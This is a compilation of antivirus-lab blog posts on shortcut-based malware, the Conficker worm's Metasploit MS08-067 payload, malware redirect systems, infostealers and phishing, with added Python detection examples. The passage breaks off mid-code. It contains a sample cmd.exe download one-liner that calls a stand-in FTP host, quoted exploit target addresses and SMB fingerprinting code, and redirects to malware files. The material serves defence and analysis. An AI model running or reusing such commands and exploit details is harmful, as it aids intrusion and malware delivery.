     The example above is the shortcut to Adobe Acrobat Reader after infection. The path to the malicious “Config.Msi.exe” (in the red box) has been inserted before the original path “AcroRd32.exe” (in the yellow box), so the original path is now treated as a parameter to the malware file. Clicking the shortcut runs the W32/Mokaksu malware, which in turn executes the original program while it keeps running in the background. The user only sees the application the shortcut was associated with, which makes the infection much harder to notice.

  3. Scripts in shortcuts
     Shortcuts can also carry a command line for “cmd.exe” instead of linking to a trojan executable. The Downloader-BMF trojan is such a case.

     When the user clicks one of these LNK files, the command line silently writes an FTP script to disk and uses it to download VBS scripts from FTP servers. The downloaded VBS scripts then download the trojan files.

In the first two cases, shortcuts are just a way of launching malware, whereas in the last case the LNK files are standalone malicious files: no other malicious executable is needed, only the legitimate “cmd.exe”. Such LNK files can be attached to emails or hosted on web sites, so we need to be more careful with them. Users can check a shortcut by viewing its file properties or by examining the file with a binary editor.
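As an added example that is not part of the original post, here is a Python checker that does what the paragraph above suggests without a binary editor: it parses the Shell Link header and StringData of a .lnk file and applies the two heuristics described in the post (a cmd.exe target carrying a command line, or an argument string that itself points at another executable). The sample shortcuts are built by the script from constructed paths; the Config.Msi.exe location and the FTP command line are assumptions modelled on the text, not data from real samples. The builder writes only the RelativePath and Arguments fields, whereas real shortcuts also carry a LinkTargetIDList and LinkInfo, which the parser skips over.

```python
import re
import struct

# Shell Link (.lnk) header constants from the MS-SHLLINK specification.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO           = 0x02
HAS_NAME                = 0x04
HAS_RELATIVE_PATH       = 0x08
HAS_WORKING_DIR         = 0x10
HAS_ARGUMENTS           = 0x20
HAS_ICON_LOCATION       = 0x40
IS_UNICODE              = 0x80
# StringData fields appear in this fixed order, each only if its flag is set.
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location")]


def build_lnk(relative_path, arguments=""):
    """Build a minimal shortcut carrying only RELATIVE_PATH (and ARGUMENTS) StringData."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | (HAS_ARGUMENTS if arguments else 0)
    header = struct.pack("<I16sIIQQQIiIHHII",
                         0x4C, LNK_CLSID, flags, 0x20,  # HeaderSize, CLSID, LinkFlags, FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,                        # creation / access / write FILETIMEs
                         0, 0, 1,                        # FileSize, IconIndex, ShowCommand (SW_SHOWNORMAL)
                         0, 0, 0, 0)                     # HotKey, Reserved1, Reserved2, Reserved3

    def string_data(text):                               # CountCharacters + UTF-16LE characters
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body = string_data(relative_path)
    if arguments:
        body += string_data(arguments)
    return header + body


def parse_lnk(data):
    """Return the StringData fields of a .lnk file as a dict."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize does not count its own two bytes
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize counts the whole structure
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[name] = data[off:off + count].decode("cp1252", "replace")
            off += count
    return fields


EXEC_ARG = re.compile(r"\.(exe|com|scr|bat|cmd|vbs|js)\b", re.I)


def classify(fields):
    """Heuristics for the two abuse patterns described in the post."""
    target = fields.get("relative_path", "").lower().rsplit("\\", 1)[-1]
    args = fields.get("arguments", "")
    if target in ("cmd.exe", "command.com") and args:
        return "script-in-shortcut"     # the shortcut itself is the malware; only cmd.exe is needed
    if args and EXEC_ARG.search(args):
        return "parasitic-chain"        # target runs first, the original program is its argument
    return "clean"


# Constructed samples modelled on the post; the paths are assumptions, not real malware data.
SAMPLES = {
    "acrobat_clean": build_lnk(r"..\..\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe"),
    "acrobat_mokaksu": build_lnk(r"C:\WINDOWS\Config.Msi.exe",
                                 r'"C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe"'),
    "downloader_bmf": build_lnk(r"C:\WINDOWS\system32\cmd.exe",
                                r"/c echo open ftp.example.invalid>s.txt&echo get x.vbs>>s.txt&ftp -s:s.txt"),
}

if __name__ == "__main__":
    for label, blob in SAMPLES.items():
        print(label, classify(parse_lnk(blob)))
```

To check a real shortcut, read the file in binary mode and pass the bytes to parse_lnk; a target whose real location lives only in the IDList will show up with an empty relative_path, so treat a missing path as something to look at rather than as clean.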

If you find suspicious strings, please do not run the files but rather send the files to Avert for further research.

Mac Trojans Follow Successful Windows Path

It has been a week since we first saw the new Mac malware, the iWork09 Trojan, which is disguised as pirated software. Since then there have been several reports of new Mac Trojans.

Before this we saw mostly lame malware for Mac OS X, but the iWork09 Trojan brings a new element to Mac Trojans: sophistication. It has peer-to-peer-like characteristics and even encrypts its traffic. It has also been associated with some recent distributed denial-of-service attacks.

One thing to remember when dealing with pirated software is that you may have a high price to pay, in this case ending up with a Trojan that turns your computer into a zombie. We have seen this happen for years with Microsoft products and even with AV products. (If you search for “McAfee” on torrent sites you will find plenty of copies with serial numbers, but you won’t know whether the thing is a trojanized version.) Now this unfortunate trend has arrived on the Mac platform, with several reports of trojanized versions of pirated Mac applications.

Take care — you often get what you pay for. ;)

The McAfee 2009 Threat Predictions

Today, we at McAfee Avert Labs released our 2009 Threat Predictions. Amongst the findings are:

Threats Hide in the Cloud
Miscreants have also transitioned to the Internet “cloud” as their main delivery vehicle and take advantage of the attractions of Web 2.0. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution.

Personalized Threats Speak Your Language
Threats will continue to take evasive action against security measures. One example is the existence of single-use binary files, which are an attacker’s equivalent of a single-use credit card number used by consumers when shopping online. These binaries help to create a vast sea of threats, which will make it harder for victims to describe their assailants, and make it harder for defenders to catch them. Additionally, McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

Malware Targets Consumer Devices
McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

The Rogue Web and Malvertising
Last year McAfee also saw the malware underground use mainstream practices in an effort to “sell” software that was either misleading or outright fraudulent. McAfee expects this trend to continue as cybercriminals still see a lucrative market in this area.

McColo: The Effects of a Takedown
Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we will see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN. Together, these organizations will shine the public light on these malicious actors and shut down their access to network and systems infrastructure.

Download the full report from our whitepaper page here.

Fake antivirus and a real threat

Fake-alert malware preys on innocent victims by displaying misleading scan alerts. It tricks the user into buying fake antivirus software to fix the falsely exaggerated scan results. This class of “scareware” depends on aggressive social-engineering tactics and comes bundled with backdoors, password stealers, downloaders, droppers, Browser Helper Objects and more.

Each of these classes of malware is used either to distribute the fake antivirus itself or to propagate other malware once the fake antivirus is installed on the victim’s machine. Working towards a common goal, extorting money from an innocent victim, these scareware applications have now added a new class of malware to their armory: rootkits.

Apart from hiding the scareware’s files, the rootkit ensures that access to genuine security vendors’ sites is blocked. The rootkit we noticed, named “tdss[random characters].sys”, was blogged about by Computer Associates recently in connection with the AntiSpywareXP2009 scareware. We, however, found it protecting rogue components belonging to the WinWebSecurity scareware. This implies that either:

  1. the author of the rootkit is supplying his code to multiple scareware vendors for money, or
  2. the same group is creating and distributing multiple fake antivirus products.

McAfee AV detects and cleans this rootkit component from DAT version 5496 onwards. A user stuck with a machine that does not have antivirus with updated signatures, however, will have to clean this rootkit manually.

If you are a Windows user, apart from the usual safe computing practices that include using a firewall, an updated Windows operating system and an antivirus software, consider the following steps to minimize the chances of getting infected by such scareware:

  1. Install backup software that can revert your system to a previous known-clean state
  2. Browse the Internet from sandbox software
  3. Install a virtual machine and browse the Internet from inside it

On a final note, the Federal Trade Commission has recently won a restraining order against Innovative Marketing and ByteHosting Internet Services - companies responsible for marketing the scareware applications WinFixer, WinAntivirus, DriveCleaner, ErrorSafe and XP Antivirus. However, we will have to wait to see if this move actually has any impact on curbing the distribution of scareware.

Don’t worry, Obama did not refuse to be a president!

In less than four days the inauguration of President-Elect Barack Obama will make headlines. At McAfee we expected cybercriminals to use this event for their typical attacks, as they do whenever the news gives them such an opportunity.

Unfortunately, we were right: some sites have already started circulating fake information on the subject to lure in the crowds and infect their computers. Here is one we recently discovered. As you can see for yourself, its author does not hesitate to use sensationalism:

Let me add that if you are lured into this trap on an inadequately protected PC, you will be infected by malware we detect as W32/Waledac.gen.b.

This website was not created by a joker; it is very professionally done, and it is protected by a botnet using the fast-flux technique I explained here and here.

Once again, be vigilant and do not unwisely follow a link you may have received via email or find upon a search!

Conficker Worm using Metasploit payload to spread

Recently we received some new samples of the W32/Conficker.Worm to analyze. While investigating we found that this worm carries an exploit for the recent MS08-067 vulnerability and uses the exploitation method derived from the Metasploit ms08_067_netapi module to spread. Below is a packet capture of the traffic sent by the worm:

As we can see in the image above, the packet contains random alphabetic characters that appear to have been generated by Rex::Text.rand_text_alpha in ms08_067_netapi.rb. If we read the data in the red box as little-endian DWORDs, we get three addresses, 0x00020408, 0x6f8917c2 and 0x6f88f807, which are the internal constants of one of the ms08_067_netapi.rb targets, as listed below (from Metasploit):

  # Metasploit's NX bypass for XP SP2/SP3
  [ 'Windows XP SP3 English (NX)',
    {
      'Ret'       => 0x6f88f807,
      'DisableNX' => 0x6f8917c2,
      'Scratch'   => 0x00020408
    }
  ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
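As an added example, not part of the original analysis, the following Python scans a payload for the three little-endian DWORDs listed above and names the Metasploit target they belong to; it turns the byte-order conversion described in the text into a simple detection check. Only the target quoted from ms08_067_netapi.rb is included, and the sample payload is constructed here with alphabetic filler, not taken from the worm’s capture.

```python
import struct

# The one target triple quoted above from ms08_067_netapi.rb (Scratch, DisableNX, Ret).
KNOWN_TARGETS = {
    "Windows XP SP3 English (NX)": (0x00020408, 0x6f8917c2, 0x6f88f807),
}


def find_dwords(payload, wanted):
    """Scan every byte offset for little-endian DWORDs in `wanted`; return {value: [offsets]}."""
    hits = {v: [] for v in wanted}
    for off in range(len(payload) - 3):
        value = struct.unpack_from("<I", payload, off)[0]
        if value in hits:
            hits[value].append(off)
    return hits


def match_target(payload):
    """Name the Metasploit target whose three addresses all occur in the payload, else None."""
    for name, addrs in KNOWN_TARGETS.items():
        hits = find_dwords(payload, addrs)
        if all(hits[a] for a in addrs):
            return name, {"0x%08x" % a: hits[a] for a in addrs}
    return None


# Constructed packet fragment (not the real capture): alphabetic filler standing in for the
# rand_text_alpha padding, around the three addresses in the order the post lists them.
FILLER = b"QxNvTpRhLkZaWdCmEsYbGiJoUfAe"
SAMPLE_PAYLOAD = FILLER + struct.pack("<III", 0x00020408, 0x6f8917c2, 0x6f88f807) + FILLER

if __name__ == "__main__":
    print(match_target(SAMPLE_PAYLOAD))   # the constructed fragment names the XP SP3 target
    print(match_target(FILLER))           # filler alone matches nothing
```

Because all three values are offsets into one specific build of ACGENRAL.DLL, a match is high-confidence for that target but says nothing about the other language targets; a signature derived from it should sit alongside a rule on the MS08-067 RPC request itself rather than replace it.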

The latest Metasploit exploit covers Windows XP and 2003 and also includes targets for several language versions, such as English, Arabic, Czech, Danish, German, Greek, Spanish, Finnish, French, Hebrew, Japanese, Chinese and more. The ms08_067_netapi module also provides an “smb_fingerprint()” function to detect the Windows version, Service Pack and language of the target OS. This makes programming a worm much easier and allows a much bigger impact: using the Metasploit module as the code base, a worm author only needs to implement the downloading and spreading logic. We believe an average programmer who understands the basics of exploitation and has decent programming skills could do this. After further analysis of the traffic capture we found that only the functions for detecting the OS version and Service Pack were embedded in this worm. Without the remote OS language detection ‘feature’, the worm targets only English OS versions at the time of writing.

Here is a packet capture snippet used in this malware to detect the OS version and Service Pack information:

By sending an SMB session setup request, it can detect the OS of the target machine. If the OS is Windows Server 2003, the Service Pack information is returned as well.

Since there is a huge number of Windows XP systems, the worm author clearly did not want to miss out on this pool, so the worm determines the XP Service Pack level by trying to open the \SRVSVC named pipe, much like the Metasploit smb_fingerprint() function does:

  if (os == 'Windows XP' and sp.length == 0)
    # SRVSVC was blocked in SP2
    begin
      smb_create("\\SRVSVC")
      sp = 'Service Pack 0 / 1'
    rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
      if (e.error_code == 0xc0000022)
        sp = 'Service Pack 2+'
      end
    end
  end

So in this instance it is obvious that malware and worm writers are abusing open-source tools to their advantage to make their work easier.

For those who haven’t patched their machines, we suggest you install the MS08-067 patch ASAP! If you are a McAfee Host IPS or Network IPS user, we have verified that you are protected against this worm by signature IDs 3961 and 0x40709d00 respectively. For VirusScan users, DAT version 5444 has coverage to detect this worm.

McAfee Monthly Spam Report Debuts

Today we at McAfee Avert Labs released the first of our new monthly publications: the “McAfee January Spam Report.”

Within its pages you will find excellent information on current spam trends, campaigns, and maybe even some “winners and losers.” Some of the highlights of the January issue include:

Political Spam
Tax Relief Junk Mail
Unemployment and Diploma Spam Increases
Christmas E-Cards

As well as some 2009 spam predictions! Definitely worth the download and read. Watch for our February issue in about four weeks. All spam reports, as well as other white papers, are available from our whitepaper download area here.

Rogue LinkedIn Profiles Lead To Malware

LinkedIn is a popular social networking site where you can manage business contacts online. Since you can set up a profile with links to your own website, it attracts criminals’ attention as well. A Google search reveals that several hundred fake LinkedIn profiles, from nude “Kirsten Dunst” to nude “Hulk Hogan”, already exist. The rogue profiles all look alike, with a picture of the celebrity and three links to the parts of the “nude video”, as shown in the following picture.

This is the lure: don’t follow these links! The linked websites contain obfuscated script code that decodes to a simple browser redirection. McAfee already detects this obfuscated script proactively as “Exploit-IFrame.gen.c”.

If you followed the link (don’t!) to see how deep the rabbit hole goes, you would end up at a Traffic Management System like the one described in this Avert Labs blog entry. On every reload the server-side application points to a different domain.

So when an unsuspecting user is tricked into following the lure, he ends up on various malicious websites trying the classic social-engineering tricks: either the “missing video codec” or a fake AV scan telling the user that his computer is infected and offering a “free” AV scanner, which in fact is the real threat. So beware when following links, even on trusted Web 2.0 platforms like LinkedIn, especially when they promise nude celebrity videos.

One Hacker May Conceal Another

The current crisis in Gaza between Palestinians and Israelis marks a renewal of web defacement activity. Various Moroccan hacker groups have been pointed out by the press; the best known is “Team-Evil,” which just hacked the Ynet Israeli news site.

This weekend, I read various French posts speaking about ethical hacking and “e-jihad” operations made by “pacifist hackers” motivated only by their political ideology. However, reality is sometimes different from perception, and one hacker may conceal another.

On New Year’s Day various web sites were hacked by people introducing themselves as “Morocco & Gaza Hackers” or the “Team Cruel Boys” group.

On the defaced page, one attacker, whose email address is m0x0m_at_hotmail.fr, introduced himself as “M. SoOoSo.” His message seems clear: “I’m not a saboteur, and I didn’t hack this site as an act of sabotage.” At first glance this guy could gain some sympathizers of the Palestinian cause.

But the story is not so simple. A week before, on Christmas Day, I heard about a phishing attack against Orange.fr, a French Internet provider. Using a mirror site, the attackers tried to intercept user names and passwords in order to access emails and personal data.

Speaking with the discoverers of this identity theft attempt and looking at the code, I noted that the stolen data were sent to the same m0x0m email address. Moreover, the PHP script was named soooso.php. What a curious coincidence!

A second email address pointed to another possible Moroccan. As a result of some searches I made today, I would not be surprised if this second guy (if he is not the same as the first) was also involved in some fake auction operations.

Of course I can prove nothing, but it would not be the first time we have heard hackers claiming to be ethical “white hats” who are really engaged in criminal activities.

Inside The Malicious Traffic Business

The Web’s classic social-engineering trick, the “missing video codec”, tries to lure people into clicking a link and downloading and installing an executable that pretends to be the application needed to watch a movie. The animated picture below is such an example: at first glance it looks like a typical embedded video that fails to load. The “picture” states that you have to click on it to see the movie. And here the lure begins. In this blog entry we follow it down and outline what kind of traffic management backbones are deployed for malware campaigns nowadays.

In our example the animated image is hosted on a popular blog platform and the link points to a suspicious Flash sample. A quick analysis reveals that the Flash file is compressed and additionally contains obfuscated JavaScript code to hide its real intention. The script redirects to another location.

The new location points to a so-called “Traffic Management System”. In this case, if you load the URL several times, the destination rotates, and after too many retries you are always redirected to the Google homepage. The system remembers your IP address server-side for a certain period; after that time, or if you simply use another IP address, you will see the redirections again when visiting the URL.

The redirections are plain HTTP “302 Found” responses whose Location header is set by the server running the traffic management system. Another example, which also used geo-location, was outlined in this Avert Labs blog post, where a downloader trojan contacted such a system and different malware binaries were downloaded depending on the country.

Such traffic management systems are nowadays configured through web-based administration interfaces. Typically the links for the “incoming traffic” look like http://www.example.com/in.cgi?three or http://www.example.com/in.cgi?default, where “three” or “default” are campaign IDs inside the system. A typical rule could look like the one shown in the following picture.

The administrator can define rules for “incoming traffic” that produce different “outgoing traffic” under different restrictions. For example, geo-location can be used to redirect visitors from one country to one location while visitors from another country are sent elsewhere; think of localized campaigns targeting the language spoken in those countries. Users from the United States will thus not be redirected to a French phishing site, and vice versa.

These systems can also use more complex rules based on network ranges and the referrer, so that, say, only visitors arriving with a Google referrer are redirected to a malicious site, and only as long as the visitor’s IP address does not fall in well-known network ranges belonging to security companies.

Why do that? This way only users who reach the website through a search get the malicious redirect, while the website’s owner or administrator, who usually does not search for it but types the URL directly into the browser, sees the normal website with no oddities. This helps the attacker keep the infection under the radar for longer.

Other traffic management systems, like the one shown in the picture above, also feature separate logins to the web interface: for the administrator, the “sellers” and the “buyers”. This particular system has different views for sellers of traffic, that is, the operators of infected web sites containing an IFRAME that points at the traffic management system, and for buyers of traffic, e.g. the people who run exploit servers and try to install malware on unpatched computers and are thus looking for potential victims. The traffic management system sits between the infected web sites and the exploit servers. As the picture shows, payment options can also be configured: the more traffic a seller redirects to a buyer, the more money is paid. With such a system in between, campaigns can easily be swapped or the “traffic” sold to new buyers who want to install their own malware.

So the classic starter, the “missing video codec” trick, can end up in quite a complex system managing modern malware campaigns. Visiting or following a malicious resource nowadays means being redirected by a complex server-side management system.

A New spam circulating fake wire transfer statements

Today a new downloader trojan is being spammed widely. The spam message is made to look like a reply to a query from the victim asking about a wire transfer.

spam message

When the user runs the file “bank_statement.scr” from the attached zip file, it downloads the BackDoor-DSG trojan while, as a decoy, fetching an innocent PDF document from a legitimate site and opening it. The PDF document, however, has nothing to do with any wire transfer.

innocent pdf file

We see that the trojan file is repacked for each message, so no two are identical. In addition, this time the malware authors are changing the resource sections of the PE files, such as the icons and the file properties.

For example, we observed following icons:

Icons

Other resources:

File Description:

  • Auto-reader Module
  • Reader_Module
  • Adobe Reader HSMC
  • Adodb_SSL_reader

Translation:

  • English
  • Spanish
  • Korean

CompanyName:

  • Adobe
  • ADOBE

These crafted resources, as well as the malicious code, are the product of server-side polymorphism intended to evade detection by antivirus software. McAfee Avert Labs detects the current wave of the downloader as BackDoor-DSG.dldr and the dropped files as BackDoor-DSG with DAT 5474 or later.

From Fake Banking to Regionally Targeted Malware

From fake online banking to regionally targeted celeb porn: that is just two days in the life of a “FormSpy” (a.k.a. “Infostealer”) malware campaign. In the past few days a spam run started promoting a fake “Bank of America” web site, announcing a change to the online banking interface to its “customers.” So that these “customers” can have a quick look at the “demo” page, a preview link is provided, as shown in the sample spam mail:

Example of fake banking spam

Innocent users who follow the lure by clicking the link are presented with a fake banking web site that uses the well-known missing-codec trick to convince them to download an additional component supposedly needed for a website or video to work. This time it is an apparent update for “Adobe Flash Player” that they require you to install for their “demo page” to work. The update of course is not legitimate software but a trojan.

We have taken a brief look under the trojan’s hood: it not only installs a rootkit but also collects private information from the infected computers. This information is leaked to a server using HTTP POST requests and may in the end be sold or used to spread the attacking party’s malware further.

The embedded rootkit is written to harddisk once the trojan is executed - the rootkit driver’s Portable Executable header can be seen in the screenshot below.

Among the private information collected are POP3, IMAP and FTP server credentials, but also credentials for the popular “ICQ” instant messenger. See below for a screenshot of the malware’s pseudocode:

The trojan is moreover capable of receiving and executing commands from the malicious host it phones home to, so the malware’s behavior may change and “improve” at any time.

The list of commands currently understood by this variant of the trojan is as follows:

  • “VER” - sets a “version” key underneath the Windows Registry path “HKEY_CURRENT_USER\Software\Microsoft\InetData” to a particular string
  • “EXE” - updates itself by downloading a new version and storing the resulting executable in the Windows directory. The filename is chosen randomly, depending on the current time
  • “DL” - downloads an executable from the Internet (but doesn’t run it)
  • “DL_EXE” - downloads and runs an executable from the Internet
  • “DL_EXE_ST” - downloads an executable from the Internet, adds its path to “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” and executes it
  • “REBOOT” - forces the computer to reboot

An additional spam run targeting Swiss Internet users was reported by the “Reporting and Analysis Centre for Information Assurance MELANI” just yesterday. The mail, written in German, promotes a Swiss adult web site hosting celebrity videos. Subjects include “Bl*wj*b with Madonna” or “Britney Spears in front of porn camera – scandal“. When following any link in the mail, the user is directed to one of many different malicious domains showing pages similar to the one seen below.

Just like with the fake banking web site mentioned above, the videos presented on this celebrity page are said not to work without a codec - too bad! This time the user is lured with a high-definition video plugin named “Adobe Player HD plugin”. Again, this is of course not a missing codec but a trojan aimed at downloading further malware. Noteworthy about this downloader is that it contacts a web server with a traffic management system installed: depending on the user’s geo-location, different malware is delivered. While, for instance, a user from Germany will be sent a file called “de.exe”, …

HTTP/1.1 302 Found
Date: Wed, 10 Dec 2008 15:33:58 GMT
Server: Apache/2
Set-Cookie: …
Location: http://***-*****.com/de.exe
Vary: Accept-Encoding,User-Agent
Content-Type: text/html

… a user from Switzerland will get “305.exe”:

HTTP/1.1 302 Found
Date: Wed, 10 Dec 2008 15:39:48 GMT
Server: Apache/2
Set-Cookie: …
Location: http://***-*****/305.exe
Vary: Accept-Encoding,User-Agent
Content-Type: text/html

Comparing the malware currently spread by the malicious host shows that Swiss residents are delivered a variant of the same “Infostealer” family seen in the “Bank of America” spam campaign shown above, while users from Germany are delivered a spam bot instead. So spam mails are sent from victims in one country, while information is stolen from the computers of victims in another.
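The two redirect responses above differ only in the Location header, which is what an analyst fetching the same URL from different countries would diff. The following is an added example, not code from the original post: it parses raw HTTP responses captured from two vantage points and reports whether the host hands out a different payload per region. The responses are constructed from the headers quoted above, with the redacted hostname replaced by the placeholder “REDACTED-HOST.example” and a placeholder cookie value.

```python
# Added example (not from the original post): compare where a server
# redirects clients from different geographic vantage points, to spot a
# host that hands out a different payload per country. The two responses
# are constructed from the headers quoted in the post; the redacted
# hostname is replaced by the placeholder "REDACTED-HOST.example".
from urllib.parse import urlparse

RESPONSES = {
    # vantage point -> raw HTTP response (status line + headers only)
    "DE": (
        "HTTP/1.1 302 Found\r\n"
        "Date: Wed, 10 Dec 2008 15:33:58 GMT\r\n"
        "Server: Apache/2\r\n"
        "Set-Cookie: session=placeholder\r\n"
        "Location: http://REDACTED-HOST.example/de.exe\r\n"
        "Vary: Accept-Encoding,User-Agent\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
    ),
    "CH": (
        "HTTP/1.1 302 Found\r\n"
        "Date: Wed, 10 Dec 2008 15:39:48 GMT\r\n"
        "Server: Apache/2\r\n"
        "Set-Cookie: session=placeholder\r\n"
        "Location: http://REDACTED-HOST.example/305.exe\r\n"
        "Vary: Accept-Encoding,User-Agent\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
    ),
}


def parse_response(raw):
    """Split a raw HTTP response into (status_code, headers).

    Header names are lower-cased; repeated headers are joined with ', '.
    """
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return status, headers


def redirect_target(raw):
    """Return the Location URL of a 3xx response, or None for anything else."""
    status, headers = parse_response(raw)
    if 300 <= status < 400:
        return headers.get("location")
    return None


def compare_vantage_points(responses):
    """Map each vantage point to the file it is redirected to and say whether
    the host serves different payloads to different regions."""
    payload_by_region = {}
    for region, raw in responses.items():
        target = redirect_target(raw)
        if target is not None:
            payload_by_region[region] = urlparse(target).path.rsplit("/", 1)[-1]
    return {
        "payload_by_region": payload_by_region,
        "geo_targeted": len(set(payload_by_region.values())) > 1,
    }


if __name__ == "__main__":
    print(compare_vantage_points(RESPONSES))
```

Note that the Vary header only declares User-Agent and Accept-Encoding; the per-country choice is made on the client address and is invisible in the response, which is why a single fetch from one location never reveals the full set of payloads.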

The “FormSpy” (a.k.a. “Infostealer”) malware is blocked by Artemis as “Generic!Artemis (trojan or variant)”; additional coverage is in the 5461 DATs.

Click The Link Below: The Bad Habits That Create New Victims Of Online Fraud

Many of us consider the Internet community to be a collective conscience, and consider the dirty schemes that tricked us once upon a time to now be common sense no-nos. Unfortunately, newcomers to the Internet community do not (yet) have a means of digitally absorbing all of the wisdom we’ve learned as web-surfing veterans. While today you’re likely to look at someone who’s never been on the Internet as an alien life form, a surprising number of new users are logging on for the first time. Even in the US, the advent of cheap broadband is leading more schools, offices, and households to incorporate the Internet as an everyday way of life, and with that come a lot of nuances. In addition to this, scammers are getting smarter and finding new ways to trick seasoned Internet users. Even if you’ve been online for years, it can sometimes be difficult to spot new tactics being used to e-mug you.

While it’d be nice to think that common sense will always protect you, common sense alone has proven to be only marginally effective against the evolving online fraud syndicate. The FBI’s 2007 IC3 summary reported over 200,000 complaint submissions of online fraud, up from the mere 16,000 complaints received when the program began in 2000. Of the complaints received, the typical kind of scam that would give your common sense a chance to flex - Nigerian 419 scams - represented a mere 1% of all complaints, suggesting very few people are falling for these anymore. Instead, the new big-ticket item in the underworld of fraud is phishing. Phishing is considered by the FBI as “foremost” among email-based scams, and seeks to elicit information about a person’s identity – such as credit card and social security numbers, and other information which can be used to commit crimes of identity theft. Phishing is a smoke and mirrors trick designed to fool you into thinking you’re logging into your bank or credit card’s website, when in reality you’re using a mock-up site designed to steal your personal information.

Online fraud and identity theft crimes accounted for over 17% of the total complaints received in 2007. It’s no surprise that online fraud is growing given how lucrative fraud scams can be. In 2007, over $239 million was lost by those reporting complaints to IC3. This set a new record for financial loss, and yet the number of actual complaints was at a three-year low. The complaint count was similar to that of 2004, yet in 2004, only $63 million had been lost to scammers. This suggests that scammers have become much more efficient than they used to be. Today’s criminals clean people out of more money, and do it with less effort.

It’s no surprise too that 32% of these scams were perpetrated using a website, and 73% involved email correspondence. It’s relatively inexpensive to deploy a phishing site kit on hundreds of hacked or free web servers and then send out millions of email messages to hook the few unsuspecting individuals who fall for the bait. While a specialist in the field might recognize the site to be a forgery, the average computer user has only a few basic instincts to know whether they’re safe.

Most Internet users will apply some form of common sense rules when visiting a website. The most valid question they can ask is, “does the URL in my address bar match that of my financial institution?” Simply applying this one basic rule can thwart a majority of phishing attacks. Applying the wrong types of common sense assumptions can be dangerous. Replies from victims such as, “the website looked real to me”, and “the link in the email looked right” are not uncommon, and are usually the result of being taught a few bad habits.

Scammers are working actively to outsmart their victims, but what the victims might not know is that there is another factor also working against them: their financial institution. Even after years of knowing how phishing sites operate, many banking and credit card institutions continue to teach their customers bad habits by conditioning them in ways that poison their common sense. None of this is done maliciously, of course, but somehow their webmaster never got the memos about phishing. Some of the bad habits your financial institution might be teaching you include: 


Click This Link

After years of knowing this is a bad idea, many legitimate websites are still sending email messages to their customers with clickable links. Clickable links have been abused by phishing scammers since the beginning because they allow you to craft a web address that displays the legitimate institution’s website URL in the email, but will take you to the scammer’s mock-up website when you click on it.

Using clickable links in correspondence conditions the customer to fall victim to these types of scams, and causes them to ignore the URL in their address bar. 

Email sent from your company should never instruct a user to click on a link. Instead, instruct them to simply visit your website. If you must provide a URL, provide it in plain text and keep it simple.


Paste This Link

Almost as bad as clickable links is the practice of instructing a customer to copy and paste a link into their browser. This is another common bad habit that has been exploited by scammers to steal your personal data. Many scammers simply remove the leading www prefix, or the http:// protocol prefix to avoid filters from seeing the URL in their email. This conditions the customer to assume the link is valid because it’s not clickable, and might also prevent them from visibly confirming the URL.

Email sent from your company should never provide a URL so complex that it must be copied and pasted. Provide only the main URL to your website, which the customer should be able to identify with. Anything overly complex should be linked to from the website once they get there.
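The two habits above (clickable links whose visible text hides the real destination, and “paste this” URLs stripped of their http:// or www prefix) can both be checked mechanically before a message leaves the company, or when a suspicious one arrives. The following is an added example, not code from the original post: it audits an HTML e-mail against a single trusted domain. TRUSTED_HOSTS, the sample message and the hostnames in it are constructed for this example.

```python
# Added example (not from the original post): audit an HTML e-mail for the
# two link habits described above. It flags (1) anchors whose visible text
# is a URL that does not match the real href, (2) anchors pointing outside
# the institution's single domain, and (3) schemeless "paste this" URLs in
# the plain text. TRUSTED_HOSTS and the sample message are constructed.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_HOSTS = {"examplebank.example"}  # assumption: the institution's one domain

# Something that looks like a hostname or URL, with or without http:// and www.
URL_LIKE = re.compile(
    r"(?:https?://)?(?:www\.)?[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}(?:/\S*)?", re.I
)

SAMPLE_EMAIL = (  # constructed phishing-style message
    "<p>Dear customer, your account needs attention.</p>"
    '<p><a href="http://secure-login.badhost.example/x">'
    "https://www.examplebank.example/login</a></p>"
    "<p>Or paste examplebank.example.account-check.example/verify into your browser.</p>"
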